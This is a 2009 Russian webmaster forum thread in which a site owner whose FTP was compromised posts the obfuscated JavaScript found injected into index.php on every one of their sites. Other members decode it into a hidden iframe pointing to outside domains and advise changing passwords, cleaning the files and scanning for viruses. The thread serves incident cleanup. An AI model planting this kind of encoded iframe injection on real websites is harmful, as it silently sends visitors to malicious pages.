X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Взломали Ftp доступ к хостингу
shtrih
shtrih
Topic Starter сообщение 14.6.2009, 21:49; Ответить: shtrih
Сообщение #1


Здравствуйте!
Кто то получил доступ к моему серверу и на всех моих сайтах прописал в index.php вот это:



<script></script><script>eval(unescape("%76%61%72%20%66%32%38%20%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%31%30%34%2c%31%31%36%2c%31%31%36%2c%31%31%32%2c%35%38%2c%34%37%2c%34%37%2c%31%30%31%2c%31%30%38%2c%39%37%2c%31%31%30%2c%31%31%36%2c%31%31%34%2c%39%37%2c%31%31%35%2c%39%37%2c%31%31%30%2c%31%31%36%2c%31%31%34%2c%31%31%31%2c%31%31%32%2c%31%30%31%2c%34%36%2c%31%31%34%2c%31%31%37%2c%34%37%2c%31%31%30%2c%31%30%35%2c%31%30%33%2c%31%30%34%2c%31%31%36%2c%31%31%32%2c%39%37%2c%31%31%34%2c%31%31%36%2c%31%32%31%2c%34%36%2c%31%30%34%2c%31%31%36%2c%31%30%39%2c%31%30%38%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%5c%27%27%2b%66%32%38%2b%27%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%29%3b"));</script>


это можно расшифровать?
И вообще что в этих ситуациях надо делать?
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
mr4q
mr4q
сообщение 14.6.2009, 21:58; Ответить: mr4q
Сообщение #2


Ифрейм

<script></script><script>eval(unescape("var f28 = String.fromCharCode(104,116,116,112,58,47,47,101,108,97,110,116,114,97,115,97,11
0,116,114,111,112,101,46,114,117,47,110,105,103,104,116,112,97,114,116,121,46,10
4
,116,109,108);document.write(unescape('<iframe src=\''+f28+'\'></iframe>'));"));</script>

1. Сменить пароли.
2. Обрыть все index.php и шаблоны и удалить мусор.

Сообщение отредактировал mr4q - 14.6.2009, 22:00


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Olney
Olney
сообщение 14.6.2009, 22:08; Ответить: Olney
Сообщение #3


shtrih - смените пароли на FTP, почистите файлы и проверьте компьютер на вирусы.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Погодин
Погодин
сообщение 14.6.2009, 22:10; Ответить: Погодин
Сообщение #4


shtrih, удали этот код, проверь компьютер утилитой CureIt! и поменяй пароль на ftp.


--------------------
Куплю домен скрытый ЯК (раcсмотрю все тематики). Зона, АГС - не важно.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ecasoft_ru
ecasoft_ru
сообщение 14.6.2009, 22:22; Ответить: ecasoft_ru
Сообщение #5


А сами не сливали случайно траф?


--------------------
По делом...
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
shtrih
shtrih
Topic Starter сообщение 14.6.2009, 22:49; Ответить: shtrih
Сообщение #6


Пароли сменил.
Пароль сложный стоял... перебор исключён. Стояли 2 партнёрки по сливу трафа попандер и 1андер, но они стояли только на двух сайтах, на остальных партнёрок небыло.
Посмотрел дату изменения index.php , подчти все файлы были изменены вчера в 11:45 и сегодня он ещё 1 файл в 6:35 менял

Сообщение отредактировал shtrih - 14.6.2009, 22:56
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Fabregas
Fabregas
сообщение 14.6.2009, 22:57; Ответить: Fabregas
Сообщение #7


Пароль сложный стоял... перебор исключён

естественно...ftp чаще всего вирусами ломаются, при этом вирус мог быть у вас год назад, а ftp поломать теперь. Было дело...


--------------------
Мои лайфхаки для путешественника и все в таком духе.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
shtrih
shtrih
Topic Starter сообщение 14.6.2009, 23:00; Ответить: shtrih
Сообщение #8


mr4q, а что за Ифрейм такой? что он делает?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
shtrih
shtrih
Topic Starter сообщение 14.6.2009, 23:10; Ответить: shtrih
Сообщение #9


вот, ещё такой скрипт отискал..


<iframe src="http://filmbridgelife.cn:8080/index.php" width=146 height=175 style="visibility: hidden"></iframe><script></script><script>eval(unescape("%76%61%72%20%66%32%38%20%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%31%30%34%2c%31%31%36%2c%31%31%36%2c%31%31%32%2c%35%38%2c%34%37%2c%34%37%2c%31%30%31%2c%31%30%38%2c%39%37%2c%31%31%30%2c%31%31%36%2c%31%31%34%2c%39%37%2c%31%31%35%2c%39%37%2c%31%31%30%2c%31%31%36%2c%31%31%34%2c%31%31%31%2c%31%31%32%2c%31%30%31%2c%34%36%2c%31%31%34%2c%31%31%37%2c%34%37%2c%31%31%30%2c%31%30%35%2c%31%30%33%2c%31%30%34%2c%31%31%36%2c%31%31%32%2c%39%37%2c%31%31%34%2c%31%31%36%2c%31%32%31%2c%34%36%2c%31%30%34%2c%31%31%36%2c%31%30%39%2c%31%30%38%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%5c%27%27%2b%66%32%38%2b%27%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%29%3b"));</script>


интересно, что он делает?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
zazik
zazik
сообщение 14.6.2009, 23:58; Ответить: zazik
Сообщение #10


Пользователи в фоновом режиме уходят на другой сайт вроде, сделай то что сказали в первых двух постах и не парься


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Выгрузки из KEYS.SO, SPYWORDS.RU, SERPSTAT.COM, AHREFS.COM, MAJESTIC.COM, доступ в SEMRUSH.COM
всё в одном месте - экономия времени и денег
28 Germeso 25634 19.10.2019, 21:08
автор: Germeso
Открытая тема (нет новых ответов) Куплю доступ к сервису Linkpad
Сбор внешних ссылок
5 Kuzzma 2054 11.8.2019, 22:28
автор: Rybakin
Открытая тема (нет новых ответов) Передам доступ к Ahrefs за 1/3 цены месячной подписки
3 Tutich 1979 2.4.2019, 11:52
автор: Tutich
Открытая тема (нет новых ответов) Куплю доступ к tz.binet.pro
tz.binet.pro
0 tehno_music 2916 4.6.2018, 11:45
автор: tehno_music
Открытая тема (нет новых ответов) Куплю доступ к сервисам Пузата
1 absoluteness 2440 17.8.2017, 18:59
автор: Silverspam


 



RSS Текстовая версия Сейчас: 29.3.2024, 12:21
Дизайн